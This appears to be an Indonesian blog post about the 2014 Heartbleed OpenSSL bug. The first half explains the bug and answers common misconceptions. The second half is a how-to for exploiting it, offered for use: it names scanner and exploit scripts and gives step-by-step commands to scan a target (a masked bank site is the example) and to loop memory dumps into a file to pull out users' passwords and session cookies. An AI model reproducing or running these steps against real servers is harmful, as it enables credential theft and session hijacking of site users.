Beberapa
hari lalu dunia digemparkan dengan munculnya celah keamanan
paling berbahaya sepanjang sejarah Internet, yaitu
Heartbleed.Sebenarnya, Apa itu Heartbleed? Ini adalah Bug, dan tentunya
masih banyak orang yang bingung dengan kehebatan Bug ini.
Oleh karena itu, Jaka tertarik untuk membahasnya, terkadang ada yang menyebut
Heartbleed ini adalah Virus, dan ada juga yang mengatakan bahwa
Heartbleed ini dapat
hack akun Facebook kamu. Tidak juga.
Berikut adalah serangkaian Fakta-fakta tentang Heartbleed.
- Hearbleed Bukanlah Sebuah Virus
Tidak seperti yang banyak orang sangka, Heartbleed ini bukanlah virus, melainkan sebuah Bug, yaitu dimana terdapat celah keamanan pada OpenSSL.Celah tersebut muncul karena kesalahan penulisan kode dalam protokol enkripsi open-source yang digunakan oleh ribuan situs dan server di dunia.
OpenSSL berguna untuk memastikan komunikasi antar-jaringan dapat terlindungi. Dengan adanya Bug ini, tentu celah bagi para hacker untuk menyusup akan terbuka lebar.
- Tidak Perlu Mengganti Semua Password Anda
Ya,
dengan hadirnya Heartbleed ini memang kita dituntut waspada pada setiap
akun yang kita miliki, mulai dari jejaring sosial hingga perbankan,
tapi bukan berarti kita harus sesegera mungkin mengganti password.INGAT!,
Ganti password bertujuan hanya untuk mengamankan akun anda. Tapi jika
memang situs tersebut memerintahkan anda untuk merubah password segera,
turutilah, bisa jadi ada yang tidak beres dengan akun anda.
- Akun Saya Tidak Bisa Dibuka? Apa Terkena Heartbleed?
Hadirnya
Heartbleed ibarat menjadi tumbal. Semua Akun yang tidak bisa dibuka
selalu dikaitkan dengan Bug ini, padahal tidak sepenuhnya benar.Bisa
jadi anda ceroboh dalam melakukan sesuatu, sehingga lupa kalau pernah
meninggalkan jejak disuatu tempat, sehingga akun anda kena bajak. Jadi,
tidak sepenuhnya Hearbleed berperan dalam aktifitas ini.
Jika ragu, Coba tanyakan teman anda yang memiliki Akun serupa, apakah bisa dibuka atau tidak.
- Selain Website, Heartbleed Juga Merembet ke Smartphone
Ini
adalah hal yang sangat masuk akal, Tidak hanya website, ternyata juga
banyak smartohone yang kena dampaknya. Melalui apa? Tentu melalui
aplikasi.Karena Heartbleed bisa mengganggu kerja server dan
router web yang diterobos, yang tentunya bisa membuat Hacker berhubungan
dengan server tersebut, sehingga kemungkinan pencurian data pengguna
bisa diterapkan.
Jika kamu pengguna Android, kamu bisa mengecek apakah ada dari salah satu Aplikasi kamu yang terinfeksi Heartbleed atau tidak.
- Apakah Facebook Terjangkit Heartbleed?
Ya, Facebook adalah salah satu situs yang menggunakan SSL.Tapi,
bukan berarti semua data penggunanya dapat tercuri. Pihak Facebook
telah mengkonfirmasi bahwa mereka telah melakukan tindak pencegahan
terhadap Bug ini, sehingga data pengguna bisa dikatakan aman.
Tapi jika kamu ingin tetap mengganti password, ya silahkan saja, karena itu memang tindak keamanan yang tepat.
- Apakah Windows XP Lebih Mudah Terjangkit Heartbleed?
Microsoft
memang telah mengakhiri dukungan Windows XP pada 8 April 2014. Tapi
bukan semata-mata Heartbleed dapat leluasa menguasai OS tersebut.Perlu
kita ketahui, Microsoft mengakhiri dukungan pada Windows XP pada saat bug Heartbleed ini ditemukan.
Lagipula, Windows XP bukanlah OS yang menggunakan OpenSSL, Microsoft membuat enkripsi yang mereka kembangkan sendiri, sehingga dampak Heartbleed tidak akan terasa.
Bagaimana Cara Hack Melalui Heartbleed :
LANGSUNG AJA BROO
Tool: Download
-ssltest.py -scanner
-pacemaker.py -listen handshake clients
-heartbleed.py -exploit
1. SCAN TARGET
Buka Coonsole, masukan:
"python ssltest.py <target>"
Contoh:
"python ssltest.py www.bank*.com"
jika website vulnerability..
2. (a). FIND USER AND PASS
Buka console, masukan:
"python pacemaker.py"
Biarkan..
Buka COnsole baru, masukan:
"python heartbleed.py <target> -x 4"
sekarang agan hanya perlu mencari 'private' user dan pass website tersebut
2. (b) FIND COOKIE-SESSIONS
Buka console, Masukan:
"python pacemaker.py"
biarkan..
Buka console baru, masukan:
"while true; do python heartbleed.py <target> >> /root/out1 ; sleep 5; done"
biarkan..
Buka console baru, masukan:
"tail -f /root/out1"
Sekarang anda hanya perlu mencari cookie-sessions website tersebut.
Note:
untuk memudahkan anda mencari, klik 'Search' pada menu bar console
-> 'Find' dan ketikan 'user' atau 'cookie' pada kotak find